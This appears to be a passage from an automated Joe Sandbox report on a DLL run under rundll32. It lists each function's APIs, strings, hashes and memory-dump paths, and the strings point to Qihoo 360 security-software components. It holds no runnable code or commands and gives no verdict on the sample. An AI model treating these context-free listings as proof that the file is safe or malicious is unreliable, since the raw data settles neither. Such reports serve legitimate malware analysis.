                                                                                                  • API ID: String$??3@FreeFromHeapProcess_wcsupr_wtoi
                                                                                                  • String ID: hotkey$internetshortcut
                                                                                                  • API String ID: 2885337837-1159320594
                                                                                                  • Opcode ID: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
                                                                                                  • Instruction ID: 4557ede77b3344c9b7d134b2ef366cc1eba795b6e68afc4d6349487d3a9816dc
                                                                                                  • Opcode Fuzzy Hash: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
                                                                                                  • Instruction Fuzzy Hash: 56915972701B4886EB96DF69D84079D33A0F748BE4F44C626AA6D477E4DF38CA99C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003AA00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156sleepthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentSleepThread
                                                                                                  • String ID: JudgeVersion
                                                                                                  • API String ID: 1164918020-3141317846
                                                                                                  • Opcode ID: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
                                                                                                  • Instruction ID: 47c15e1018a900855fb3b169089698e2b9417bb7c9542535bb0a2760737ebbf6
                                                                                                  • Opcode Fuzzy Hash: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
                                                                                                  • Instruction Fuzzy Hash: EE51AB32604A889AFB979F65DD843DE73A1F3097D4F468525EA2A83790DF34CA99C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005E750 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152filesynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesDeleteErrorLast$MutexRelease
                                                                                                  • String ID: PRAGMA synchronous = OFF;
                                                                                                  • API String ID: 874664252-1854902270
                                                                                                  • Opcode ID: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
                                                                                                  • Instruction ID: fa77642fd0660764f5a509da37546a8681fbf34ddf7b90f5fa11f8d2a21f9c13
                                                                                                  • Opcode Fuzzy Hash: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
                                                                                                  • Instruction Fuzzy Hash: 6551A335700B8996FEDE8F6594517B92390AB4DBD4F048524BEAE677E0DF35CA098300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800570A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Path$Exists$ModuleNameRemoveSpecmemset
                                                                                                  • String ID: %hd.%hd.%hd.%hd$\360ver.dll$\QHVer.dll
                                                                                                  • API String ID: 3680197243-1037704697
                                                                                                  • Opcode ID: 3e80556d967b03fa81a8d0e192ef84c8c157516f2ebd988b45dcbe8060877e80
                                                                                                  • Instruction ID: 3305af636dff0720fe62b84610ade698e39c861821be0ce054630d245facfc05
                                                                                                  • Opcode Fuzzy Hash: 3e80556d967b03fa81a8d0e192ef84c8c157516f2ebd988b45dcbe8060877e80
                                                                                                  • Instruction Fuzzy Hash: 73516572701A4982E751DB29D84078A77A0F789BF4F408212FA6D877E5DF39CA49CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180044568 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@CriticalSection$??3@Deleterand$CountInitializeTickmemsetsrand
                                                                                                  • String ID: http://%s/dquery
                                                                                                  • API String ID: 3689213441-2489601265
                                                                                                  • Opcode ID: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
                                                                                                  • Instruction ID: 80c6b5da0a524930356cbb69355e12e6cacd4ac9a253962bc35af1aeed2dd264
                                                                                                  • Opcode Fuzzy Hash: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
                                                                                                  • Instruction Fuzzy Hash: F3619076211F4986E7829B64EC843D933A0FB497A8F518316ED29076E5EF78C78DC344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005ECC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Path$CriticalExistsModuleNameSection$AppendCloseControlCreateCurrentDeviceEnterHandleLeaveProcessmemset
                                                                                                  • String ID: \Config\MessageCenter.db$\deepscan\heavygate64.dll$\heavygate64.dll
                                                                                                  • API String ID: 830827343-1853890022
                                                                                                  • Opcode ID: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
                                                                                                  • Instruction ID: ed8f6b5c495fe7c06dfc5e892af335cc1c0a2688f7bbfb93a7c5ae832a2d3b97
                                                                                                  • Opcode Fuzzy Hash: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
                                                                                                  • Instruction Fuzzy Hash: 12413B72214A8995EBB5DF21EC413D92360F7897C8F808112FA4D9B5A9DF39C70DCB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180004288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeFromPathTaskmemset$AttributesCombineCreateFileList
                                                                                                  • String ID: :
                                                                                                  • API String ID: 2941325240-336475711
                                                                                                  • Opcode ID: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
                                                                                                  • Instruction ID: dc65f2bc49bddac93e31888ce9d3fd3537e0c7ef9c239f6ea7558133a88505f1
                                                                                                  • Opcode Fuzzy Hash: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
                                                                                                  • Instruction Fuzzy Hash: 7731747260458881EAB5DB16E4543ED7361FB8CBC4F44D115FA4E86AA5DF3CCB49C704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180060A0C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClassNameTextWindowmemset
                                                                                                  • String ID: ApplicationFrameWindow$Microsoft Edge
                                                                                                  • API String ID: 1817102812-2764675319
                                                                                                  • Opcode ID: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
                                                                                                  • Instruction ID: cbb3fe303a1e4ce820f684c33e5910fd11efe3c021ca595ae8cabc946684c7f6
                                                                                                  • Opcode Fuzzy Hash: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
                                                                                                  • Instruction Fuzzy Hash: 3721943135478985FAA19F65E8843DA6361F78C7C4F648125AAAD872A4EF7CC74DC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180008B5C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66libraryloaderregistryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc$Delete
                                                                                                  • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                                                  • API String ID: 2668475584-1053001802
                                                                                                  • Opcode ID: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
                                                                                                  • Instruction ID: 915c5fbfce3db82b286e5c0612373c0c02ac60b4c6bcd7d6af2be75d68b23045
                                                                                                  • Opcode Fuzzy Hash: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
                                                                                                  • Instruction Fuzzy Hash: 9F314675209A4891FBA2CB11EC047D973A0BB4DBD4F58C025AE9A07BA4EF3CC748D310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005F270 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54filewindowtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$View$CloseFindHandleMappingMessageOpenSendTimeoutUnmapWindow
                                                                                                  • String ID: Q360GameModeMapping$Q360SafeMonClass
                                                                                                  • API String ID: 503113698-2755034037
                                                                                                  • Opcode ID: a3dcdb3015a9b5e320c6dba5c7c91f5af997ec56152cc96ca9df43ba5da0b2dd
                                                                                                  • Instruction ID: ebb1f5daab1ae0be3269addd9342b9779a07a1984474038a4b34f5f783d133e4
                                                                                                  • Opcode Fuzzy Hash: a3dcdb3015a9b5e320c6dba5c7c91f5af997ec56152cc96ca9df43ba5da0b2dd
                                                                                                  • Instruction Fuzzy Hash: 65213E36605B4882FBA28F25B9547AAB7A1F78C7C4F458228FA4942B54DF3CD64CCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180064DE4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$AppendCriticalPathSection$memset$EnterFileModuleName$??2@CountErrorInitializeLastLeaveSpin
                                                                                                  • String ID: ..\deepscan\$speedmem2.hg
                                                                                                  • API String ID: 2338990259-1390971677
                                                                                                  • Opcode ID: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
                                                                                                  • Instruction ID: 91bce694e0342d9d21a92653d8ecf9702c458f92e478111cc4d5f0d53c5c3f7e
                                                                                                  • Opcode Fuzzy Hash: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
                                                                                                  • Instruction Fuzzy Hash: BB212C35215B4D81EA928B64FC953996360FB5C7E4F409215E96D077B4EF78C64EC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004242C Relevance: 13.7, APIs: 9, Instructions: 156networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSectionhtonlhtons$EnterLeavememmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 33644419-0
                                                                                                  • Opcode ID: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
                                                                                                  • Instruction ID: 90b71582b8c4a32b78347334d3d295f004072f45cff62f784db803bd1658b447
                                                                                                  • Opcode Fuzzy Hash: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
                                                                                                  • Instruction Fuzzy Hash: 69614736B00B549AF792DFA1E9503ED33B5B70878CF458019EE5627A98DF34866EC348
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180075290 Relevance: 13.7, APIs: 9, Instructions: 153COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$___lc_handle_func
                                                                                                  • String ID:
                                                                                                  • API String ID: 1446566272-0
                                                                                                  • Opcode ID: 9ed143e4e78ad7ca36c430c2939c308b5d5fe1ebbbc6467e3c222cd59980e3d6
                                                                                                  • Instruction ID: 126987ea53a22a0156f2cb7aa7a647ca75503bfd193424e832b10eaea163e651
                                                                                                  • Opcode Fuzzy Hash: 9ed143e4e78ad7ca36c430c2939c308b5d5fe1ebbbc6467e3c222cd59980e3d6
                                                                                                  • Instruction Fuzzy Hash: 5851E77270434487FB975F69A0403EDA290AB88BD5F58C034BBCC47AD6DE7DCA9A8710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180014F24 Relevance: 13.6, APIs: 9, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitVariant$ArraySafe$CreateElement
                                                                                                  • String ID:
                                                                                                  • API String ID: 3308809976-0
                                                                                                  • Opcode ID: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
                                                                                                  • Instruction ID: 146264a788ca7c4eb20d782c9947d04824275c30ee96bc1b713ea33f9e3da92e
                                                                                                  • Opcode Fuzzy Hash: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
                                                                                                  • Instruction Fuzzy Hash: 52515A32B00A548AE781CFA5EC843DD37B0F7487A9F158125EA5A97764EF34C64AC340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800494C4 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AuthorityProcessToken$CloseCountCurrentErrorHandleInformationLastOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3222153630-0
                                                                                                  • Opcode ID: 03483a1382fa936570146296bc3f4c9eb4d3748e16a6552bbad511bfd4114ef8
                                                                                                  • Instruction ID: 72112d729816a6905d55889d123a89fc47246d9648d7bb45982a69a3b8d3ada9
                                                                                                  • Opcode Fuzzy Hash: 03483a1382fa936570146296bc3f4c9eb4d3748e16a6552bbad511bfd4114ef8
                                                                                                  • Instruction Fuzzy Hash: A8215131705B4882FB969F92F880399A3A4FBDCBC4F158035EA5957764DF3CC6598704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004578C Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 443COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsstr$HeapProcess_time64free
                                                                                                  • String ID: DomainQuery$com$error_code
                                                                                                  • API String ID: 495166474-1186067173
                                                                                                  • Opcode ID: 48d2666e35a99de3c2b6d37465d73b0056f431e6c8eee1a5ce3d51caaf477776
                                                                                                  • Instruction ID: 59fbc5dadb6708d67137b6e4bedff87eb2f76b606422a1c9441d9b3eaf16e58a
                                                                                                  • Opcode Fuzzy Hash: 48d2666e35a99de3c2b6d37465d73b0056f431e6c8eee1a5ce3d51caaf477776
                                                                                                  • Instruction Fuzzy Hash: 6802C372701F4882EA91DB29D8803DD23A0FB88BE9F458215FAAD577D5DF38CA49C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001E59C Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 311COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: %I64u$.exe$InitString$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
                                                                                                  • API String ID: 2081463915-3789319691
                                                                                                  • Opcode ID: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
                                                                                                  • Instruction ID: 99d661dcfab4fd9f60583e58d61e1d075c9151c162a47e32eebc6396990c7acc
